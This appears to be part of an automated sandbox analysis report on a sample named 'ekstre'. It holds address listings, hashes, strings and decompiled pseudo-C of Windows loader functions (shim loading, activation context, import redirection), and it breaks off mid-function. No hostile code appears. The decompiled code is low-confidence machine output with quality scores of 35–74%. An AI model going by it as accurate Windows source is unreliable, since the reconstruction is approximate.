0x341666e1
0x341666f6
0x341666b2
0x341666b2
0x341666b2
0x341666b5
0x341666b7
0x341666b7
0x341666ba
0x341666bf
0x341666c1
0x00000000
0x341666b2
0x341666b0
0x00000000
0x00000000
0x00000000
0x341665ba
0x341665ba
0x341665bf
0x341665d5
0x341665d9
0x341c9835
0x341c983a
0x341c983c
0x341c983e
0x341c9859
0x341c985e
0x341c9863
0x341c9863
0x341c9866
0x341c9868
0x341c986a
0x341c986a
0x341c986d
0x00000000
0x341c986d
0x341665e2
0x341665ec
0x341665f1
0x341665f4
0x341665f7
0x341665fb
0x3416660f
0x34166614
0x3416661a
0x3416661c
0x3416661f
0x00000000
0x3416661f
0x34166602
0x34166606
0x341c9875
0x341c987a
0x341c987c
0x341c987e
0x341c9880
0x341c989a
0x341c989f
0x341c98a4
0x341c98a7
0x341c98a9
0x341c98ab
0x341c98ab
0x341c98ac
0x341c98ae
0x341c98b3
0x341c98b4
0x341c98b6
0x341c98bd
0x00000000
0x341c98bd
0x3416660c
0x00000000
0x34166624
0x3416662a
0x3416662f
0x34166636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34166614
RtlDebugPrintTimes.NTDLL ref: 3416665F

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341C9854, 341C9895
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 341C9843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 341C9885
LdrpLoadShimEngine, xrefs: 341C984A, 341C988B

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: b78eb629b1c61c113d03a1f1543f96e6fc2130501a3d1f1cbb29259c92eea406
Instruction ID: 9ee16051fd6098131e4673ef832ad8c5f346c90ba0d3b578a3156ed21203d8ed
Opcode Fuzzy Hash: b78eb629b1c61c113d03a1f1543f96e6fc2130501a3d1f1cbb29259c92eea406
Instruction Fuzzy Hash: C9510876A10B58DFEB04CB6CCCD8E9D7BA6EB50308F044199E851BB1A5CBB89C51CF84

Uniqueness

Uniqueness Score: -1.00%

Function 3421ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3421EDD0
RtlDebugPrintTimes.NTDLL ref: 3421EE45

Strings

HEAP: , xrefs: 3421ECDD
---------------------------------------, xrefs: 3421EDF9
Entry Heap Size , xrefs: 3421EDED
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3421EDE3

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 3365613cddafa3d31b703fa0685d79c349c9fd1f11208f770de433c9c521904c
Instruction ID: 7520bf84f8365d4a831255fadac94ef062d980e5b9747dd8fbecc05243a2628e
Opcode Fuzzy Hash: 3365613cddafa3d31b703fa0685d79c349c9fd1f11208f770de433c9c521904c
Instruction Fuzzy Hash: EA418F79600212DFD705CF18C88894ABBEAFF49354B25C0A9D449FB221CB75EC42CB84

Uniqueness

Uniqueness Score: -1.00%

Function 34179046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34179046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x3424be98);
				E341C7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E341B8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E34189870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x342665e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E3418A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = L34195A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E341904C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x342665e0; // 0x76e8a680
							 *0x342691e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x342665e8;
									if(_t148 != 0) {
										 *0x342691e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E3418DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									L34183B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E34189870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E341D247B();
									goto L26;
								} else {
									_t152 = E3418A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E341904C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x34179046
0x34179046
0x3417904b
0x34179050
0x34179055
0x3417905b
0x3417905d
0x34179066
0x3417906f
0x34179078
0x34179080
0x34179088
0x3417908f
0x34179095
0x341790a9
0x341790b1
0x341790be
0x341790c6
0x341790cf
0x341790e2
0x341790f7
0x341790fb
0x34179118
0x00000000
0x34179123
0x3417913b
0x3417913f
0x00000000
0x00000000
0x34179147
0x341d231f
0x341d231f
0x00000000
0x341d231f
0x34179154
0x341d2330
0x341d2336
0x341d2336
0x3417915a
0x3417915a
0x3417915a
0x34179161
0x34179167
0x3417916b
0x34179172
0x34179182
0x3417918e
0x34179199
0x341791ba
0x341791be
0x00000000
0x341791e0
0x341d2358
0x341d2360
0x341d2368
0x341d236a
0x341d2372
0x00000000
0x341d2378
0x341d2378
0x341d2381
0x341d2458
0x341d2458
0x341d245b
0x341d2463
0x341d2468
0x341d246e
0x341d246e
0x341d24a7
0x00000000
0x341d24a7
0x341d238f
0x341d2396
0x341d239c
0x341d239f
0x341d239f
0x341d23bb
0x341d23c8
0x341d23ca
0x341d23d2
0x341d244c
0x341d244c
0x341d2453
0x00000000
0x341d23d4
0x341d23e7
0x341d23e9
0x341d23f1
0x00000000
0x00000000
0x341d23f9
0x341d2402
0x341d2408
0x341d240c
0x341d2413
0x341d2423
0x341d243f
0x00000000
0x00000000
0x341d2441
0x341d2446
0x341d2446
0x00000000
0x341d2446
0x341d23fb
0x00000000
0x341d23fb
0x341d23d2
0x00000000
0x341d2372
0x341791be
0x34179118
0x341790fd
0x34179102
0x3417910e

APIs

RtlDebugPrintTimes.NTDLL ref: 341D2360

Strings

@, xrefs: 34179095
$, xrefs: 341790B1

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: fe988fa49255da1c280466a4efcb91310086f0b0ba2d7c5a4b207438c799f13c
Instruction ID: 12a0564c4811739c382aec6faa79ade5a6c4c5ade222923239f1735eda102da7
Opcode Fuzzy Hash: fe988fa49255da1c280466a4efcb91310086f0b0ba2d7c5a4b207438c799f13c
Instruction Fuzzy Hash: 21814BB1D00669DBEB21CB54CC84BEEBBB9AF08750F0041DAE919B7240D7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 341A4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117
timeCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E341A4C3D(void* __ecx) {
				char _v8;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t45;
				void* _t47;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_push(__ecx);
				_t45 = 0;
				_t42 = __ecx;
				_t51 =  *0x342665e4; // 0x76e6f0e0
				if(_t51 == 0) {
					L10:
					return _t45;
				}
				_t40 =  *((intOrPtr*)(__ecx + 0x18));
				_t36 =  *0x34265b24; // 0x3f22cc8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
					_t24 =  *((intOrPtr*)(_t42 + 0x28));
					if(_t42 == _t36) {
						_t47 = 0x5c;
						if( *_t24 == _t47) {
							_t39 = 0x3f;
							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
								_t24 = _t24 + 8;
							}
						}
					}
					_t48 =  *0x342665e4; // 0x76e6f0e0
					 *0x342691e0(_t40, _t24,  &_v8);
					_t45 =  *_t48();
					if(_t45 >= 0) {
						L8:
						_t27 = _v8;
						if(_t27 != 0) {
							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
								E341726A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
								_t27 = _v8;
							}
							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
						}
						if(_t45 < 0) {
							if(( *0x342637c0 & 0x00000003) != 0) {
								E341EE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
							}
							if(( *0x342637c0 & 0x00000010) != 0) {
								asm("int3");
							}
						}
						goto L10;
					}
					if(_t45 != 0xc000008a) {
						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
							if(_t45 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x342637c0 & 0x00000005) != 0) {
						_push(_t45);
						_t18 = _t42 + 0x24; // 0x123
						E341EE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
						_t49 = _t49 + 0x1c;
					}
					_t45 = 0;
					goto L8;
				} else {
					goto L10;
				}
			}

0x341a4c42
0x341a4c47
0x341a4c4a
0x341a4c4c
0x341a4c52
0x341a4cb8
0x341a4cbe
0x341a4cbe
0x341a4c5a
0x341a4c5d
0x341a4c69
0x341a4c6f
0x341a4c74
0x341a4cd6
0x341a4cda
0x341e33b9
0x341e33be
0x341e33f7
0x341e33f7
0x341e33be
0x341a4cda
0x341a4c76
0x341a4c84
0x341a4c8c
0x341a4c90
0x341a4ca9
0x341a4ca9
0x341a4cae
0x341a4ce4
0x341a4cee
0x341a4cf3
0x341a4cf3
0x341a4ce6
0x341a4ce6
0x341a4cb2
0x341e3463
0x341e347b
0x341e3480
0x341e348a
0x341e3490
0x341e3490
0x341e348a
0x00000000
0x341a4cb2
0x341a4c98
0x341a4cc5
0x341e3429
0x00000000
0x00000000
0x341e342f
0x341a4cc5
0x341a4ca1
0x341e3434
0x341e3435
0x341e344f
0x341e3454
0x341e3454
0x341a4ca7
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341A4C84

Strings

LdrpFindDllActivationContext, xrefs: 341E3440, 341E346C
minkernel\ntdll\ldrsnap.c, xrefs: 341E344A, 341E3476
Querying the active activation context failed with status 0x%08lx, xrefs: 341E3466
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 341E3439

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 7c41748fed4cd47f8c2ab432670fd5f883ef25bf3701f41964b3d7d99ff9a81f
Instruction ID: ea7f6985a5d4ab6752a2611470813be3abbaedc795b8b3a7466d3767f188ffd7
Opcode Fuzzy Hash: 7c41748fed4cd47f8c2ab432670fd5f883ef25bf3701f41964b3d7d99ff9a81f
Instruction Fuzzy Hash: 123117BEA00F55EFF721DB08C8C8E55B6A4EB00794F42C3EAD80967159D7A49DC0A691

Uniqueness

Uniqueness Score: -1.00%

Function 3419237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E3419237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x342638b8;
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x342668d8; // 0x0
						if(_t22 != 0) {
							L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x342668d8 = _t50;
							 *0x34265d4c = _t50;
						}
					}
					 *0x342638b8 = _t38;
					return _t55;
				}
				_t59 =  *0x342668d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x342638b8 = 0;
					_t55 = L341F1BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x342668d8; // 0x0
						while( *_t51 != 0) {
							 *0x342691e0(_t51, 0, "true", "true", 0, "true", 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x34269218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E3417FED0(0x342632d8);
						if( *0x342665f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E34166704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x342632d8);
						E3417E740(_t46);
						goto L21;
					}
					_t36 =  *0x342637c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E341EE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x342637c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x34192383
0x3419238b
0x3419238d
0x34192390
0x34192393
0x34192397
0x341923a5
0x341923a8
0x341923aa
0x341923b1
0x341da878
0x341da87d
0x341da883
0x341da883
0x341923b1
0x341923ba
0x341923c3
0x341923c3
0x34192399
0x3419239f
0x341da784
0x341da78f
0x341da793
0x341da7cd
0x341da80b
0x341da7e3
0x341da7e9
0x341da7ee
0x341da866
0x341da85f
0x341da85f
0x00000000
0x341da85f
0x341da7f0
0x341da7f2
0x341da7f2
0x341da7f5
0x341da7f5
0x341da7f8
0x341da7fb
0x341da808
0x341da808
0x341da812
0x341da817
0x341da81f
0x341da825
0x341da826
0x341da82d
0x341da82f
0x341da83b
0x341da83d
0x341da849
0x341da850
0x341da850
0x341da849
0x341da855
0x341da85a
0x00000000
0x341da85a
0x341da795
0x341da79c
0x341da7b4
0x341da7b9
0x341da7be
0x341da7c3
0x341da7c5
0x341da7c5
0x341da7c6
0x341da7c6
0x00000000

Strings

minkernel\ntdll\ldrinit.c, xrefs: 341DA7AF
apphelp.dll, xrefs: 34192382
LdrpDynamicShimModule, xrefs: 341DA7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 341DA79F

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: c0a74a3ec76638117f78b96e69b29d3d59b102a6736b7a973775f948eab4cca0
Instruction ID: 0e433da05ff06965883e421ef1906f45ea8784010b8cd30e0a592c9e9943a134
Opcode Fuzzy Hash: c0a74a3ec76638117f78b96e69b29d3d59b102a6736b7a973775f948eab4cca0
Instruction Fuzzy Hash: 39310BB6A00A00EFF710DF5DC8C4EA9BBB5FB85794F1540A9E80577290DBB59942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 341F43D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E341F43D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = L341F4B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x34266714; // 0x0
				_v16 = _t68;
				_t69 =  *0x34266710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x34266710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E341F4528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E341F4528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x34265ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x342637c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x342637c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E341EE692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x342691e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x341f43e2
0x341f43e5
0x341f43e7
0x341f43f3
0x341f43fa
0x341f4401
0x341f440b
0x341f440f
0x341f4414
0x341f4418
0x341f4420
0x341f4424
0x341f442e
0x341f442e
0x341f4426
0x341f4426
0x341f4426
0x341f4424
0x341f4433
0x341f445e
0x341f4443
0x341f4445
0x341f444b
0x00000000
0x341f44c0
0x341f446a
0x341f446f
0x341f4471
0x00000000
0x00000000
0x341f4473
0x341f4479
0x341f447b
0x341f44d4
0x341f44d4
0x341f44db
0x341f44de
0x341f44e6
0x341f44e9
0x341f44ef
0x341f44f9
0x341f44fc
0x341f44ff
0x341f4502
0x341f451e
0x341f4523
0x341f44c9
0x341f44d1
0x341f44d1
0x341f4489
0x341f448f
0x341f4491
0x341f4493
0x00000000
0x00000000
0x341f4495
0x341f4498
0x341f449a
0x341f449c
0x341f44b8
0x341f44bb
0x341f44bb
0x341f44be
0x00000000
0x00000000
0x341f44b2
0x341f44b4
0x00000000
0x00000000
0x341f44b6
0x341f44b6
0x00000000
0x341f44b8
0x341f449e
0x341f44a0
0x341f44a2
0x341f44a4
0x00000000
0x00000000
0x00000000
0x00000000
0x341f44a6
0x341f44a6
0x341f44a6
0x341f44a8
0x341f44aa
0x341f44ac
0x341f44ac
0x341f44b0
0x341f44c4
0x00000000
0x341f44c4
0x341f444d
0x341f4450
0x341f4450
0x341f4452
0x341f445c
0x341f445c
0x00000000
0x341f445c
0x341f4454
0x341f4456
0x00000000
0x00000000
0x341f4458
0x00000000
0x341f4458
0x341f4447
0x00000000
0x341f4447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 341F4489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 341F4508
LdrpCheckRedirection, xrefs: 341F450F
minkernel\ntdll\ldrredirect.c, xrefs: 341F4519

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 8c7c550e6128dd1ff8dc34f6b019dcd7c6f1448f049c420b192190e99eac7bc6
Instruction ID: 19cd434910c5b10a09504c876ece7b101463177d2c75d3557858473e2498a6c0
Opcode Fuzzy Hash: 8c7c550e6128dd1ff8dc34f6b019dcd7c6f1448f049c420b192190e99eac7bc6
Instruction Fuzzy Hash: F141B176608F119FDB11CE58CC80A1677E8EF98658F06479DED88B7365D732D802AB81

Uniqueness

Uniqueness Score: -1.00%

Function 3419EE48 Relevance: 6.3, APIs: 4, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E3419EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
